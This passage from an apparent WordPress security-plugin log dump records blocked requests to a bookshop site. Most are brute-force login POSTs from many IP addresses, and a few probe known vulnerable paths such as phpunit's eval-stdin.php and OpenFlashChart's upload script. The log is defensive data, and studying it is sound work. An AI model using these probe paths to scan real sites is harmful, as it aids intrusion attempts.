Safari\\/537.36\"}','NQpRV70OlfxZiEA8dXHPGY52',0,1638488866.4512,464,'','POST',403,0,600,0,1,'',0),('103.121.89.72',1736005960,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','k9BTq4cibo5fKjxFhn10ErOv',0,1638489564.2940,522,'','POST',403,0,600,0,1,'',0),('188.212.34.69',3168019013,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.111 Safari\\/537.36 MVisionPlayer\\/1.0.0.0\"}','6zF0AphQWJos9SvHTRDKPrwa',0,1638490263.8255,531,'','POST',403,0,600,0,1,'',0),('164.68.101.188',2755945916,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.84 Safari\\/537.36\"}','C7SoNWrMHuI5KthAe9fBaJv2',0,1638490966.9140,636,'','POST',403,0,600,0,1,'',0),('178.128.194.13',2994782733,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/49.0.2623.112 Safari\\/537.36\"}','vjAgK7UyOd8q4CtuXZx25BNp',0,1638491665.2386,539,'','POST',403,0,600,0,1,'',0),('185.50.199.194',3107112898,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.80 Safari\\/537.36\"}','dJroQHg9wLEYsSIUxmvaV7Kp',0,1638492365.8261,666,'','POST',403,0,600,0,1,'',0),('107.150.57.35',1805007139,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','20KF3Zt5qiR1wASPTNCYWLMh',0,1638492467.9255,162,'','POST',403,0,600,0,1,'',0),('185.2.4.71',3103917127,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/55.0.2883.87 Safari\\/537.36\"}','qU36ISOBLsn24WAG9aDklcw8',0,1638492852.0556,690,'','POST',403,0,600,0,1,'',0),('144.76.102.246',2420926198,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','c4a936THud70LqbSJRDNie1g',0,1638493549.9551,488,'','POST',403,0,600,0,1,'',0),('51.77.223.41',860741417,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.106 Safari\\/537.36\"}','1OuoK78Ep9RqJaAvY52lWtrg',0,1638494250.9135,481,'','POST',403,0,600,0,1,'',0),('95.128.43.176',1602235312,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.109 Safari\\/537.36\"}','vhSeiAPjmRWDlNFqXG9VtI0n',0,1638494953.6320,587,'','POST',403,0,600,0,1,'',0),('144.91.68.146',2421900434,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','wzOfWRyxQEUcmbdn7FD31620',0,1638495657.5507,456,'','POST',403,0,600,0,1,'',0),('178.128.194.13',2994782733,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.77 Safari\\/537.36\"}','dNEuUtbfnzvc7HFWsDlT9Rk4',0,1638496357.3136,181,'','POST',403,0,600,0,1,'',0),('23.228.109.147',400846227,'','https://ashbooks.co.uk/wp-content/plugins/civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php','','{\"1\":\"ALittle Client\"}','xlJHYIzBUjr3Qhp5c4DPTO9W',0,1638496501.7086,400,'','GET',403,0,700,0,1,'',0),('176.9.91.103',2953403239,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','ApbYRq7rOfoC65e1yvGX8DEV',0,1638497063.6922,1764,'','POST',403,0,600,0,1,'',0),('134.209.231.225',2261903329,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/55.0.2883.87 Safari\\/537.36\"}','lu9dCENJfDZWvSzMAgOnaoUT',0,1638497786.9013,420,'','POST',403,0,600,0,1,'',0),('34.92.58.160',576469664,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.101 Safari\\/537.36\"}','1LMu8fKFASeNyHXJ2awBDWkv',0,1638498492.7855,589,'','POST',403,0,600,0,1,'',0),('204.12.198.242',3423389426,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10.8; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','DPKnNQhcBGL1l5wSuj9WXiH7',0,1638498768.2409,1119,'','POST',403,0,600,0,1,'',0),('178.32.89.175',2988464559,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.122 Safari\\/537.36\"}','lwUCMNc3AvQ6SaH7P0puXdz4',0,1638499206.2723,426,'','POST',403,0,600,0,1,'',0),('156.38.216.210',2619791570,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.111 Safari\\/537.36 MVisionPlayer\\/1.0.0.0\"}','7B4yw1FOHlzfvhLeDgUVJrEb',0,1638501318.9842,609,'','POST',403,0,600,0,1,'',0),('187.51.127.28',3140714268,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\"}','Zrk8RgvSDQIjJGE5hbaXHi3M',0,1638502003.0092,577,'','POST',403,0,600,0,1,'',0),('188.40.71.188',3156756412,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.84 Safari\\/537.36\"}','nHthpdXCoNTZw8smceUPO3ua',0,1638502668.4829,415,'','POST',403,0,600,0,1,'',0),('173.212.212.180',2916406452,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','5hW4BZ1dLNeugHoykJUqzTc7',0,1638503323.6405,505,'','POST',403,0,600,0,1,'',0),('167.71.89.92',2806471004,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.94 Safari\\/537.36\"}','6UJNAxvgWEeP5VRtMqc8rB40',0,1638503983.7564,876,'','POST',403,0,600,0,1,'',0),('81.88.52.26',1364735002,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/61.0.3163.100 Safari\\/537.36\"}','wzpHOjbrMUQi3dqLvNyB7FJT',0,1638504645.2300,459,'','POST',403,0,600,0,1,'',0),('103.142.26.247',1737366263,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/66.0.3359.117 Safari\\/537.36\"}','ZPidsGWp7V4haq3ztxv1uBcH',0,1638505314.6274,724,'','POST',403,0,600,0,1,'',0),('46.101.26.42',778377770,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.87 Safari\\/537.36\"}','9t4f8KAVESxW5M1UviCQeu3N',0,1638505973.0894,455,'','POST',403,0,600,0,1,'',0),('103.114.144.212',1735561428,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.87 Safari\\/537.36\"}','BMWv29bkYDN130cUEwl7aifd',0,1638506635.6608,609,'','POST',403,0,600,0,1,'',0),('82.208.189.233',1389411817,'','https://ashbooks.co.uk/1index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko\\/20100101 Firefox\\/51.0\"}','VK9S2vRk3ZHhGyEUwl4gftec',0,1638506900.4929,447,'','GET',403,0,700,0,1,'',0),('35.189.40.244',599599348,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/58.0.3029.110 Safari\\/537.36\"}','l3NPTyGKCQgswHd6MvbuEafn',0,1638507310.1456,574,'','POST',403,0,600,0,1,'',0),('198.52.97.144',3325321616,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','r3pfo5wmZ6hTROiMgI4xyjNG',0,1638507992.1061,522,'','POST',403,0,600,0,1,'',0),('54.38.181.202',908506570,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.70 Safari\\/537.36\"}','zuovrS24yBZCwP9peG5FR3WO',0,1638508663.4098,576,'','POST',403,0,600,0,1,'',0),('206.189.111.216',3468521432,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.111 Safari\\/537.36\"}','PKFToODjrwI21Ev4LCRxNpGB',0,1638509343.1839,640,'','POST',403,0,600,0,1,'',0),('89.38.99.188',1495688124,'','https://www.ashbooks.co.uk/weblog/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36 Edg\\/90.0.818.49\",\"2\":\"https:\\/\\/www.ashbooks.co.uk\\/weblog\\/index.php\"}','OoJDsQ0Gdfa9EbhyvAcXt51w',0,1638509477.6817,427,'','GET',403,0,700,0,1,'',0),('34.75.201.58',575392058,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','qx510vzpPy4ZhjTJO9sDUHEA',0,1638510021.5763,570,'','POST',403,0,600,0,1,'',0),('195.176.3.23',3283092247,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.103 YaBrowser\\/18.7.0.2695 Yowser\\/2.5 Safari\\/537.36\"}','u01rfFInahm7NDsjxbVMA9KG',0,1638510344.4038,407,'','POST',403,0,600,0,1,'',0),('193.19.240.121',3239309433,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.97 Safari\\/537.36\"}','xDnPILTijwZvltEUmzk9gOGK',0,1638510707.2574,571,'','POST',403,0,600,0,1,'',0),('3.81.89.248',55663096,'','https://www.ashbooks.co.uk/weblog/index.php?p=150','','{\"1\":\"CCBot\\/2.0 (https:\\/\\/commoncrawl.org\\/faq\\/)\"}','9D5nfdFa1WBUQ3oGCbZXqJuH',0,1638511877.5261,187,'','GET',403,0,700,0,1,'',0),('192.187.127.21',3233513237,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','TRlrthAVLe2Db9W0UIC6wvpP',0,1638511984.4744,169,'','POST',403,0,600,0,1,'',0),('143.244.184.195',2415179971,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.193 Safari\\/537.36\"}','6SOLWBRzwaGfTXyn1odqKCYu',0,1638512093.2942,527,'','POST',403,0,600,0,1,'',0),('190.45.171.143',3190664079,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.101 Safari\\/537.36\"}','TeZD3syfFpG95Ih0Er4Oz8A7',0,1638512780.1321,179,'','POST',403,0,600,0,1,'',0),('176.9.91.103',2953403239,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.99 Safari\\/537.36\"}','0XJbKzUopker2sihGB5ETdqA',0,1638513467.3599,615,'','POST',403,0,600,0,1,'',0),('173.255.112.220',2919198940,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','XHA9TvsekOYN2fdCP5RMFqrn',0,1638514851.4908,1296,'','POST',403,0,600,0,1,'',0),('173.212.192.52',2916401204,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','z1ESda48CUV5oXibFW2Psre6',0,1638515546.9539,492,'','POST',403,0,600,0,1,'',0),('176.31.0.242',2954821874,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.80 Safari\\/537.36\"}','EX8vU2P3CSmxD7HbdzTZw6FR',0,1638516240.3832,481,'','POST',403,0,600,0,1,'',0),('194.163.152.242',3265501426,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.94 Safari\\/537.36\"}','Ng9ZWczLl3RTuSpb2QsyItj8',0,1638516939.3364,445,'','POST',403,0,600,0,1,'',0),('89.38.209.176',1495716272,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.122 Safari\\/537.36\"}','pqRYWX8BmFgajEuKtvzlsH6e',0,1638517630.0449,900,'','POST',403,0,600,0,1,'',0),('167.172.69.81',2813085009,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.111 Safari\\/537.36 MVisionPlayer\\/1.0.0.0\"}','5hvXljyf4m72JzKC0HVr3eLT',0,1638518323.2629,1268,'','POST',403,0,600,0,1,'',0),('162.214.190.209',2731982545,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','gmIEBoAepv54WGP9U3ZJTVnj',0,1638519017.6427,644,'','POST',403,0,600,0,1,'',0),('106.52.171.211',1781836755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/49.0.2623.112 Safari\\/537.36\"}','NXKosknevqYb4dlJVHpAi6jt',0,1638519716.7231,482,'','POST',403,0,600,0,1,'',0),('51.15.160.22',856662038,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.70 Safari\\/537.36\"}','znTLjtZ02wcHQpRPs4Mv96eB',0,1638520414.0850,433,'','POST',403,0,600,0,1,'',0),('89.96.90.125',1499486845,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.86 Safari\\/537.36\"}','PfmwsACWiTbr1MldI9RQaoGH',0,1638521102.8190,709,'','POST',403,0,600,0,1,'',0),('177.55.111.11',2973200139,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.94 Safari\\/537.36\"}','2J8oh9QPTzYxn0OpfvjDdILA',0,1638521800.0471,480,'','POST',403,0,600,0,1,'',0),('45.120.136.106',762873962,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/58.0.3029.110 Safari\\/537.36\"}','vfSV5H6cX0IRUdLTbjpCoxAD',0,1638522498.6531,633,'','POST',403,0,600,0,1,'',0),('194.163.152.242',3265501426,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/73.0.3683.75 Safari\\/537.36\"}','tEB4VTY89wLr7uzgeOdpRflo',0,1638523196.6696,589,'','POST',403,0,600,0,1,'',0),('133.18.226.126',2232607358,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.106 Safari\\/537.36\"}','PrjTFlUkDEcI72qzxweOHgKn',0,1638523892.8080,1722,'','POST',403,0,600,0,1,'',0),('190.2.138.16',3187837456,'','https://www.ashbooks.co.uk/weblog/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"https:\\/\\/www.ashbooks.co.uk\\/weblog\\/index.php\"}','fuoqj3SZDkRIJlhVdFnmvxY0',0,1638524318.4364,424,'','GET',403,0,700,0,1,'',0),('88.150.159.29',1486266141,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','mwhfgRiG9kH3TunDztosFpjQ',0,1638524584.7345,510,'','POST',403,0,600,0,1,'',0),('69.30.231.156',1159653276,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit\\/537.78.2 (KHTML, like Gecko) Version\\/7.0.6 Safari\\/537.78.2\"}','GSvLQhqnuKi8BVO6pUdoTs4R',0,1638525474.2021,451,'','POST',403,0,600,0,1,'',0),('188.166.1.143',3164995983,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/54.0.2840.99 Safari\\/537.36\"}','XeFWvAQO9h1KyGdbnlTDRofJ',0,1638526681.2744,1066,'','POST',403,0,600,0,1,'',0),('81.88.52.114',1364735090,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','cGVgle89fLtszI6AOrvYxo75',0,1638527381.4698,662,'','POST',403,0,600,0,1,'',0),('167.86.118.101',2807461477,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/68.0.3440.106 Safari\\/537.36\"}','kKhtwP0FEiAbgWUjBJln1s8e',0,1638528083.2220,521,'','POST',403,0,600,0,1,'',0),('139.59.118.238',2335930094,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/48.0.2564.116 Safari\\/537.36\"}','EXtL0Vfw1jgRFTSIlmszND7y',0,1638528791.2998,1215,'','POST',403,0,600,0,1,'',0),('212.192.241.93',3569414493,'','https://ashbooks.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php','','{\"1\":\"python-requests\\/2.26.0\"}','3hPXLOaMoc8BNp4EWGwVtRQr',0,1638529253.4705,392,'','GET',403,0,700,0,1,'',0),('212.192.241.93',3569414493,'','https://ashbooks.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php','','{\"1\":\"python-requests\\/2.26.0\"}','vrnRd51DV4iEHsYTUa8Gp6Jz',0,1638529254.0102,391,'','GET',403,0,700,0,1,'',0),('212.192.241.93',3569414493,'','https://ashbooks.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php','','{\"1\":\"python-requests\\/2.26.0\"}','sToyuc25LBreIYpfDnWVzgPM',0,1638529254.5337,131,'','GET',403,0,700,0,1,'',0),('107.172.219.253',1806490621,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/52.0.2743.116 Safari\\/537.36\"}','8EhrQAd5zVuyfUnopY2MOwtR',0,1638529497.0623,617,'','POST',403,0,600,0,1,'',0),('138.197.183.99',2328213347,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','qGON1jBXSysFeP3L6RxZMiwA',0,1638530206.8229,592,'','POST',403,0,600,0,1,'',0),('188.166.1.143',3164995983,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 Safari\\/537.36\"}','VMA3iBxkwtzJoP2yn4WpgdhO',0,1638530910.6505,440,'','POST',403,0,600,0,1,'',0),('200.170.156.249',3366624505,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','grsA3cCFufX6ZKGaMTpVUHSJ',0,1638531613.1657,506,'','POST',403,0,600,0,1,'',0),('37.139.13.163',629869987,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','bzcfj8DTakwPq7Otn9LHWM53',0,1638532314.4067,929,'','POST',403,0,600,0,1,'',0),('185.126.219.43',3112098603,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.111 Safari\\/537.36\"}','vamXpPCHtTFRzngKYr8s3DVo',0,1638533018.3671,595,'','POST',403,0,600,0,1,'',0),('34.72.140.173',575179949,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','HZdi45kW08gsympjEc21CJ97',0,1638533732.3652,527,'','POST',403,0,600,0,1,'',0),('103.121.89.72',1736005960,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.109 Safari\\/537.36\"}','y8fr2iRYmQ1GbIS9qgNUE603',0,1638534445.2934,609,'','POST',403,0,600,0,1,'',0),('45.40.166.143',757638799,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/73.0.3683.75 Safari\\/537.36\"}','UVqTw3PeYo0GRAaflicyknCx',0,1638536591.0146,473,'','POST',403,0,600,0,1,'',0),('116.255.160.108',1962909804,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/55.0.2883.87 Safari\\/537.36\"}','Q0Wuz4jHnY7K1A2V3CokZv6P',0,1638538028.2877,633,'','POST',403,0,600,0,1,'',0),('192.187.118.202',3233511114,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','hl1unEKLvgWD7cUizwPfQpeH',0,1638538035.9462,461,'','POST',403,0,600,0,1,'',0),('23.228.109.147',400846227,'','https://ashbooks.co.uk/wp-content/plugins/wpwhatsmyrankvideoregular-unlimited/php-ofc-library/ofc_upload_image.php','','{\"1\":\"ALittle Client\"}','SAgfVB8TXOjrk93QzNcILGR2',0,1638538899.0654,429,'','GET',403,0,700,0,1,'',0),('109.87.200.193',1834469569,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.86 Safari\\/537.36\"}','XI6oYhCR3S2rkzcAxde7J1ME',0,1638539459.9268,629,'','POST',403,0,600,0,1,'',0),('152.228.140.7',2565114887,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.94 Safari\\/537.36\"}','oLmaHFlbXJ8Mu3yWVQvKrGei',0,1638540177.3753,790,'','POST',403,0,600,0,1,'',0),('37.139.13.163',629869987,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/73.0.3683.86 Safari\\/537.36\"}','ilrMmBfea8AxsoS27XIbTcE9',0,1638540896.8421,628,'','POST',403,0,600,0,1,'',0),('91.219.236.228',1541139684,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.77 Safari\\/537.36\"}','BUXj6n9YPsfqErWAlCzmxFe5',0,1638541066.8109,504,'','POST',403,0,600,0,1,'',0),('167.71.199.161',2806499233,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 